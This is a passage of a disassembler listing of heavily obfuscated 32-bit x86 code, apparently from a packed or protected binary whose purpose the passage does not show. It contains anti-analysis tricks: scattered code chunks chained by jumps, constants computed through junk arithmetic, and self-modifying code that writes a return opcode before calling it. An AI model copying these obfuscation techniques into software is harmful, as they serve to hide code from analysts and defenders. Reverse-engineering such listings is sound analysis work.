; FUNCTION CHUNK AT 00451C4E SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00452623 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045477B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00454E9C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00455207 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045A6F4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B574 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045B958 SIZE 00000015 BYTES

		xchg	ecx, [esp+4+var_4]
		pop	ecx
		mov	esp, ebp
		jmp	loc_442790
sub_43F2F2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	edi, [edx]
		jmp	loc_443DB7
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_4575F8
		jmp	loc_455603
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450B30

loc_43F311:				; CODE XREF: sub_450B30+63AEj
		jz	loc_43F5AB
		jmp	loc_4493A0
; END OF FUNCTION CHUNK	FOR sub_450B30
; ---------------------------------------------------------------------------

loc_43F31C:				; CODE XREF: sub_43CC73+Ej
		sub	eax, 79BDFAA8h
		rol	eax, 5
		not	ebx
		push	ecx
		push	offset loc_4408D4
		jmp	nullsub_306
; ---------------------------------------------------------------------------
		mov	ds:dword_41E0E0, eax
		lea	eax, nullsub_14
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_14

; =============== S U B	R O U T	I N E =======================================



sub_43F346	proc near		; CODE XREF: sub_40FAE4+2Dp
					; sub_41A2E3+30p ...

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043BE05 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043EC7F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043F0D9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043FA49 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440E5D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00441833 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442824 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044383C SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00443D71 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00444A8C SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00444B9D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004455D0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00446A58 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00446AA0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044734E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449555 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00449E52 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449FF2 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044C1BF SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044C3B8 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044CE27 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D671 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E48B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045087A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450FF8 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00451E95 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452219 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452D2F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045492C SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00455115 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045518A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004551DC SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00455B29 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455CDA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004561F4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456944 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458142 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004588A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459248 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045942F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B1D4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045BEE8 SIZE 0000000D BYTES

		jno	loc_45BEE8
		mov	eax, ds:dword_457FD8
		or	eax, eax

loc_43F354:				; CODE XREF: sub_44AC89+7E1Fj
		jnz	loc_43F3B5
		jmp	loc_4561F4
; ---------------------------------------------------------------------------

loc_43F35F:				; CODE XREF: sub_443B86:loc_4507ECj
		add	eax, 135789A2h

loc_43F365:				; CODE XREF: y2kk37jd:loc_43F516j
		rol	eax, 0Dh
		mov	ds:dword_442820, eax

loc_43F36E:				; CODE XREF: sub_4438B1+8D92j
					; sub_4438B1+13CFDj
		ror	eax, 0Dh
		push	offset loc_4434F2
		jmp	nullsub_29
; ---------------------------------------------------------------------------

loc_43F37B:				; CODE XREF: sub_43E658+D199j
		jz	loc_455115
		sub	edi, 4E058262h

loc_43F387:				; CODE XREF: sub_43E658+AB1Ej
		xor	eax, 8ED49A41h
		add	eax, ebp
		add	eax, 8E558C03h
		mov	eax, [eax]
		call	sub_44289F

loc_43F39C:				; CODE XREF: y2kk37jd:0045C2B1j
		jmp	loc_44C1BF
; ---------------------------------------------------------------------------

loc_43F3A1:				; CODE XREF: sub_457533-B859j
		jmp	nullsub_30
; ---------------------------------------------------------------------------

loc_43F3A6:				; CODE XREF: y2kk37jd:00442D0Fj
		adc	eax, 0AFD30FEFh

loc_43F3AC:				; CODE XREF: sub_4562E5:loc_442CF1j
		add	esi, 71C6F871h
		mov	[esi], eax
		pop	esi

loc_43F3B5:				; CODE XREF: sub_43F346:loc_43F354j
					; sub_43F346+4506j
		push	offset sub_440D2A
		jmp	loc_4588A0
sub_43F346	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43F3BF	proc near		; CODE XREF: sub_45596A-16ECDj
					; sub_448C11+E165j

var_8		= dword	ptr -8

		push	ebx
		push	0B10D2D93h
		xchg	ecx, [esp+8+var_8]
		mov	ebx, ecx
		jmp	loc_4452AC
sub_43F3BF	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440F0C

loc_43F3CF:				; CODE XREF: sub_440F0C-B4Ej
					; sub_440F0C:loc_45B051j
		add	ebx, 0FE43BD74h
		xchg	ebx, [esp+0]

loc_43F3D8:				; CODE XREF: y2kk37jd:loc_43D588j
		jmp	sub_4526B7
; END OF FUNCTION CHUNK	FOR sub_440F0C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_248. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443831

loc_43F3DE:				; CODE XREF: sub_443831+6CF4j
		jmp	loc_457FB1
; END OF FUNCTION CHUNK	FOR sub_443831
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F1E2

loc_43F3E3:				; CODE XREF: sub_44F1E2+9j
		mov	eax, [ebp+var_4]
		mov	[ebp+var_8], eax
		push	offset loc_456C33

loc_43F3EE:				; CODE XREF: y2kk37jd:004491E9j
		jmp	nullsub_90
; END OF FUNCTION CHUNK	FOR sub_44F1E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_43F3F3:				; CODE XREF: sub_45B7AA-8339j
		mov	esi, 2D54E17Dh
		jns	loc_43B7EE
		jmp	loc_448ECE
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444A2B

loc_43F403:				; CODE XREF: sub_43B37E+Dj
					; y2kk37jd:0043FB99j ...
		mov	eax, [ebp-4]
		push	offset loc_43F03D
		jmp	nullsub_369
; END OF FUNCTION CHUNK	FOR sub_444A2B
; ---------------------------------------------------------------------------

loc_43F410:				; CODE XREF: y2kk37jd:0043B2B0j
		jnp	loc_442006
		jb	loc_44DD14
		jmp	loc_44F470
; ---------------------------------------------------------------------------
		mov	eax, 0F074E076h
		call	sub_442C3E
		mov	ds:off_41E084, eax
; START	OF FUNCTION CHUNK FOR sub_455B08

loc_43F431:				; CODE XREF: sub_455B08-119F1j
		lea	eax, sub_43D005
		jmp	loc_44E44C
; END OF FUNCTION CHUNK	FOR sub_455B08
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457239

loc_43F43C:				; CODE XREF: sub_457239:loc_44F9A1j
		mov	ecx, [ecx]
		and	ecx, 7
		push	offset loc_43E86A
		jmp	loc_444AD9
; END OF FUNCTION CHUNK	FOR sub_457239
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E20

loc_43F44B:				; CODE XREF: sub_454E20:loc_4448D3j
		or	eax, 0C47E4C87h
		pop	ebp
		jmp	loc_4535DC
; END OF FUNCTION CHUNK	FOR sub_454E20
; ---------------------------------------------------------------------------

loc_43F457:				; CODE XREF: y2kk37jd:0043B77Bj
					; y2kk37jd:00457B37j
		jz	loc_45411A
		jz	loc_45B51B
		xchg	ebx, [edi]
		xor	ecx, ebx
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_43F467:				; CODE XREF: sub_44AC89-78CAj
		and	edx, 0C004D720h
		jmp	loc_446783
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45024B

loc_43F472:				; CODE XREF: sub_45024B:loc_443BDDj
		pop	ebx
		retn
; END OF FUNCTION CHUNK	FOR sub_45024B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAAA

loc_43F474:				; CODE XREF: sub_45AAAA+10j
		jmp	loc_43E411
; END OF FUNCTION CHUNK	FOR sub_45AAAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_43F479:				; CODE XREF: sub_4429DD+778Ej
		jmp	loc_4441A7
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------

loc_43F47E:				; CODE XREF: y2kk37jd:0043CCDFj
		jmp	loc_4485AD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BA66

loc_43F483:				; CODE XREF: sub_43BA66+1D75j
					; sub_43BA66+203CBj
		mov	eax, ds:dword_4470C4

loc_43F488:				; CODE XREF: sub_4502E6:loc_44C206j
		mov	al, [eax]
		sub	al, 99h
		mov	edx, ds:dword_4470C4
		imul	byte ptr [edx]
		jmp	loc_459372
; END OF FUNCTION CHUNK	FOR sub_43BA66
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4441FF

loc_43F499:				; CODE XREF: sub_4441FF:loc_45C18Aj
		call	sub_43BF31
; END OF FUNCTION CHUNK	FOR sub_4441FF
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43F49E:				; CODE XREF: sub_445226+10A80j
		jmp	loc_443F09
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D5C1

loc_43F4A3:				; CODE XREF: sub_43D5C1+F840j
		push	0EC46376Ah
		pop	edx
		sub	edx, 458266C1h
		or	edx, 0E42D5B1h
		sub	edx, 134F99EBh
		or	edx, 1F1A2275h
		xor	edx, 9ED34E18h
		jmp	loc_452437
; END OF FUNCTION CHUNK	FOR sub_43D5C1
; ---------------------------------------------------------------------------

loc_43F4CC:				; CODE XREF: y2kk37jd:004446E5j
		sub	ebx, edx

; =============== S U B	R O U T	I N E =======================================



sub_43F4CE	proc near		; CODE XREF: y2kk37jd:00458D36p

; FUNCTION CHUNK AT 004540C3 SIZE 0000000D BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	edx, 0F2B89A19h
		call	sub_440CD1
		jmp	loc_4540C3
sub_43F4CE	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_269. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43F4E2:				; CODE XREF: sub_445226+117A0j
		jmp	nullsub_199
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_43F4E7	proc near		; CODE XREF: y2kk37jd:004438FDj
					; sub_44B489+388Ep

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		xchg	eax, [esp-4+arg_0]
		jmp	sub_442C3E
sub_43F4E7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_43F4F3:				; CODE XREF: sub_45689F:loc_456261j
		pop	eax
		and	eax, 81BA39E9h
		test	eax, 10000h
		jmp	loc_43E5AE
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_43F505:				; CODE XREF: sub_454C24:loc_447D6Fj
		shr	edx, 19h
		rol	edi, 9
		jmp	sub_43FD1C
; END OF FUNCTION CHUNK	FOR sub_454C24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_43F510:				; CODE XREF: sub_453867-8E34j
					; sub_453867:loc_44EA24j
		call	sub_43F520
		retn
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_43F516:				; CODE XREF: y2kk37jd:004575A1j
		jmp	loc_43F365
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DF1F

loc_43F51B:				; CODE XREF: sub_43DF1F+12ABAj
		jmp	loc_44431C
; END OF FUNCTION CHUNK	FOR sub_43DF1F

; =============== S U B	R O U T	I N E =======================================



sub_43F520	proc near		; CODE XREF: sub_453867:loc_43F510p
					; y2kk37jd:loc_459D75p

; FUNCTION CHUNK AT 00453956 SIZE 00000005 BYTES

		push	offset loc_443EEA
		jmp	loc_453956
sub_43F520	endp

; ---------------------------------------------------------------------------

loc_43F52A:				; CODE XREF: y2kk37jd:loc_4465EFj
		push	9EC0594Fh
		pop	esi
		xor	esi, 20387D7h
		rol	esi, 8
		xor	esi, 0A341056Dh
		sub	eax, esi
		jmp	loc_44386F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E9A8

loc_43F546:				; CODE XREF: sub_44E9A8+Dj
		or	edi, 48C17904h
		add	edi, 125043C5h
		push	offset loc_43DB29
		jmp	loc_44D9AC
; END OF FUNCTION CHUNK	FOR sub_44E9A8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_43F55C:				; CODE XREF: sub_44AAA1+14j
		jnz	loc_452AEF
		jmp	loc_458209
; END OF FUNCTION CHUNK	FOR sub_44AAA1

; =============== S U B	R O U T	I N E =======================================



sub_43F567	proc near		; DATA XREF: sub_450A16+11o

; FUNCTION CHUNK AT 0044C4CF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457C2B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045C56E SIZE 00000006 BYTES

		mov	eax, [eax]
		popf
		test	eax, eax
		jle	loc_446355
		jmp	loc_44C4CF
sub_43F567	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_43F577:				; CODE XREF: sub_44AC89+EBB0j
		mov	eax, [eax]
		or	eax, eax
		jz	loc_44457F
		jmp	loc_455488
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
		or	esi, edx
		ror	esi, 18h
		jmp	sub_43BAF2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_43F590:				; CODE XREF: sub_44AAA1:loc_458209j
		mov	eax, [esi]
		xchg	ecx, ebx
		jmp	loc_452AED
; END OF FUNCTION CHUNK	FOR sub_44AAA1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43F599:				; CODE XREF: sub_445226:loc_4476D0j
		mov	eax, [ebp+0]
		shl	edx, 1Fh

loc_43F59F:				; CODE XREF: y2kk37jd:004527FDj
		jmp	loc_43E468
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B55D

loc_43F5A4:				; CODE XREF: sub_44B55D-6F78j
		push	4D04CBAFh
		or	ebx, eax

loc_43F5AB:				; CODE XREF: sub_450B30:loc_43F311j
					; sub_44DBF8+2A1Bj ...
		jmp	loc_447804
; END OF FUNCTION CHUNK	FOR sub_44B55D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_43F5B0:				; CODE XREF: sub_44DBF8:loc_44E657j
					; sub_44B55D+7A84j
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_44DBF8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B4EE

loc_43F5B3:				; CODE XREF: sub_44966C-2360j
					; sub_43B4EE+1D2B7j
		jmp	locret_45B818
; END OF FUNCTION CHUNK	FOR sub_43B4EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_43F5B8:				; CODE XREF: sub_43ED19+19896j
		jmp	nullsub_246
; END OF FUNCTION CHUNK	FOR sub_43ED19

; =============== S U B	R O U T	I N E =======================================



sub_43F5BD	proc near		; CODE XREF: sub_44610D-483Ap
					; sub_45866A-160C1j ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004414EF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004462EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044900D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044D382 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044E96B SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00459183 SIZE 0000001B BYTES

		push	eax
		mov	eax, ebp
		jmp	loc_459183
sub_43F5BD	endp


; =============== S U B	R O U T	I N E =======================================



sub_43F5C5	proc near		; DATA XREF: y2kk37jd:0044DF9Eo

; FUNCTION CHUNK AT 0044DA55 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457380 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045AF06 SIZE 00000005 BYTES

		push	54BEA7C2h
		pop	ecx
		sub	ecx, 0F1BC6CC8h
		add	ecx, 9D421DAFh
		jmp	loc_44DA55
sub_43F5C5	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445EF2

loc_43F5DC:				; CODE XREF: sub_445EF2:loc_450FDFj
		add	esi, 55E97F03h
		jnb	loc_45727B

loc_43F5E8:				; CODE XREF: y2kk37jd:0043E185j
		jmp	nullsub_103
; END OF FUNCTION CHUNK	FOR sub_445EF2
; ---------------------------------------------------------------------------
		or	esi, 789BE36Ah
		jmp	loc_44A89B

; =============== S U B	R O U T	I N E =======================================



sub_43F5F8	proc near		; DATA XREF: sub_43EF4F+13B0Do

; FUNCTION CHUNK AT 0043ED4C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00458EBA SIZE 00000005 BYTES

		push	ebx
		push	0CAC2D02h
		pop	ebx
		add	ebx, 6C9646Bh
		sub	ebx, 32BC7800h
		and	ebx, 80E0FCD9h
		jmp	loc_458EBA
sub_43F5F8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_43F616:				; CODE XREF: sub_448700:loc_44CA3Cj
		pop	edx
		retn
; END OF FUNCTION CHUNK	FOR sub_448700

; =============== S U B	R O U T	I N E =======================================



sub_43F618	proc near		; CODE XREF: sub_4448E2:loc_43DB61j
					; sub_4577FE-19C83j ...

var_10		= dword	ptr -10h
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B232 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043C0EA SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043C484 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00448118 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044B0E4 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004519C4 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004555FE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455AD3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456008 SIZE 00000005 BYTES

		push	edi
		mov	edi, ecx
		xchg	edi, [esp+4+var_4]
		mov	ecx, ebp
		jmp	loc_44B0E4
sub_43F618	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457533

loc_43F625:				; CODE XREF: sub_457533-163DCj
		shl	ebp, 4

loc_43F628:				; CODE XREF: sub_457533:loc_44905Dj
		call	sub_446183
		mov	edx, 277EFE57h
		call	sub_440CD1
		push	eax
		jmp	loc_44BCD5
; END OF FUNCTION CHUNK	FOR sub_457533
; ---------------------------------------------------------------------------

loc_43F63D:				; CODE XREF: y2kk37jd:loc_445782j
		push	eax
		mov	eax, [ebp-18h]
; START	OF FUNCTION CHUNK FOR sub_44472C

loc_43F641:				; CODE XREF: sub_44472C+7j
		add	eax, eax
		cdq
		add	eax, [esp+0]
		adc	edx, [esp+arg_0]
		jmp	loc_45869C
; END OF FUNCTION CHUNK	FOR sub_44472C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_43F650:				; CODE XREF: sub_44C304:loc_445DCAj
		cmp	edx, 0E93A9890h
		jmp	loc_45781B
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
		mov	edx, 3BD2EC5Ch
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_43F660:				; CODE XREF: sub_443BAF-6889j
		push	edx
		push	0F0EF29B4h
		pop	edx
		rol	edx, 0Ah
		test	edx, 100000h
		jmp	loc_4401B4
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------

loc_43F675:				; CODE XREF: y2kk37jd:00453466j
		sbb	ebx, 70F85E63h

; =============== S U B	R O U T	I N E =======================================



sub_43F67B	proc near		; CODE XREF: sub_45689F:loc_45BACAp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004460CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044673C SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00454496 SIZE 0000000E BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	eax, [esp-4+arg_0]

loc_43F682:				; CODE XREF: sub_445226+C6F1j
		push	eax
		push	ecx
		push	76EC827Dh
		jmp	loc_44673C
sub_43F67B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43F68E:				; CODE XREF: y2kk37jd:0045AAECj
		jnp	loc_446E3E
		xor	edi, ebx
		adc	ebx, esi
; START	OF FUNCTION CHUNK FOR sub_441F5E

loc_43F698:				; CODE XREF: sub_441F5E+2FBBj
		add	edi, 33DB142Ch
		xchg	edi, [esp+0]
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_441F5E
; ---------------------------------------------------------------------------

loc_43F6A6:				; DATA XREF: sub_43CF31+6o
		pop	edx
		mov	eax, [esp]
		push	edx
		push	offset sub_450C3A
		jmp	loc_451B23
; ---------------------------------------------------------------------------

loc_43F6B5:				; CODE XREF: y2kk37jd:0044CFAAj
		jbe	loc_447BF0
		jmp	loc_4410BA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_43F6C0:				; CODE XREF: sub_43F75D+B32Ej
		or	edi, 22E11836h
		jnz	loc_43B583
		xchg	ebp, [edi]
		jmp	loc_43C597
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442081

loc_43F6D3:				; CODE XREF: sub_442081+1A17Cj
		sub	edx, 0A2070075h
		xor	edx, 12C7C9B1h
		add	edx, ebp
		add	edx, 54136D2h
		mov	edx, [edx]
		call	sub_44C4BC
; END OF FUNCTION CHUNK	FOR sub_442081
; START	OF FUNCTION CHUNK FOR sub_4517E6

loc_43F6EE:				; CODE XREF: sub_4517E6+7j
		jmp	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_4517E6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_43F6F3:				; CODE XREF: sub_4448E2+B8D5j
		jmp	loc_456751
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

loc_43F6F8:				; CODE XREF: y2kk37jd:0044A984j
		jmp	loc_4581EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_43F6FD:				; CODE XREF: sub_43F2F2:loc_447D99j
		jz	loc_44D331
		jmp	loc_43B3C3
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
		cmp	ebp, 47E7693Dh
		jmp	loc_43C187
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44594E

loc_43F713:				; CODE XREF: sub_44594E:loc_44BD39j
		and	eax, 0ED4E53F7h
		not	edx
		ror	ecx, 1
		sub	ebp, 9C2B9BB4h
		jmp	loc_44D9E3
; END OF FUNCTION CHUNK	FOR sub_44594E

; =============== S U B	R O U T	I N E =======================================



sub_43F728	proc near		; CODE XREF: y2kk37jd:00455D99p

; FUNCTION CHUNK AT 0044A041 SIZE 00000017 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	407E25F3h
		pop	eax
		or	eax, 5397645Dh
		sub	eax, 22010740h
		jmp	loc_44A041
sub_43F728	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_43F743:				; CODE XREF: sub_4458DD:loc_44DB06j
					; sub_448658+72AAj
		call	sub_447918
		mov	al, [ebp-5]
		pop	ebx
		pop	ecx
		jmp	loc_440ABF
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B0B

loc_43F752:				; CODE XREF: sub_453B0B+22j
		cmp	edi, 3E178684h
		jmp	loc_44950B
; END OF FUNCTION CHUNK	FOR sub_453B0B

; =============== S U B	R O U T	I N E =======================================



sub_43F75D	proc near		; CODE XREF: sub_4514DE-8AF7p

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B583 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043C597 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043CBF3 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0043CE24 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043DD9F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043E4E5 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0043F6C0 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043FC92 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044089C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441AC2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441AD2 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004440CC SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00445019 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044571F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446088 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004473B6 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044A4A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A90D SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044AA85 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B624 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044B8B5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C64F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C70F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044CD62 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D915 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044EA8C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F3DC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045066F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00450AC5 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00452B2C SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004544D2 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045496F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00459959 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004599A0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045BD9D SIZE 00000005 BYTES

		xchg	edx, [esp+0Ch+var_C]
		pop	edx
		xor	eax, 0A49F2500h
		add	eax, ebp
		jmp	loc_4473B6
sub_43F75D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447041

loc_43F76E:				; CODE XREF: sub_447041+50EDj
		not	edi
; END OF FUNCTION CHUNK	FOR sub_447041

; =============== S U B	R O U T	I N E =======================================



sub_43F770	proc near		; CODE XREF: sub_4487FD+8D09p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B1F2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E7E1 SIZE 0000000B BYTES
